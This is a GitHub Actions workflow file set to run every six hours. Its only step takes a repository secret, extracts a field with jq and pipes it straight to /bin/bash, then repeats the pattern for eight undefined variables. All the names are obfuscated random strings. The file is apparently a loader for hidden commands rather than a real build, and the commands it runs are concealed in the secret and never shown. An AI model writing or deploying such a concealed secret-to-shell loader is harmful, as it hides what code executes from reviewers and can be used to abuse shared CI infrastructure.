name: lifanfeng6556

on:
  workflow_dispatch:
  schedule:
    - cron: '58 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lifanfeng6556
        env:
          jlm81: ${{ secrets.jlm81 }}
        run: |
          echo $jlm81 | jq -r .krwlo9 | /bin/bash
          echo $usxxc4277 | jq -r .vhr9723 | /bin/bash
          echo $nh51 | jq -r .oz55816 | /bin/bash
          echo $r38452 | jq -r .jac47826 | /bin/bash
          echo $d66236 | jq -r .wxmjt11803 | /bin/bash
          echo $w45 | jq -r .smw424 | /bin/bash
          echo $td97954 | jq -r .gbp4 | /bin/bash
          echo $n02 | jq -r .cbhj4 | /bin/bash
          echo $dpuad7 | jq -r .b37107 | /bin/bash

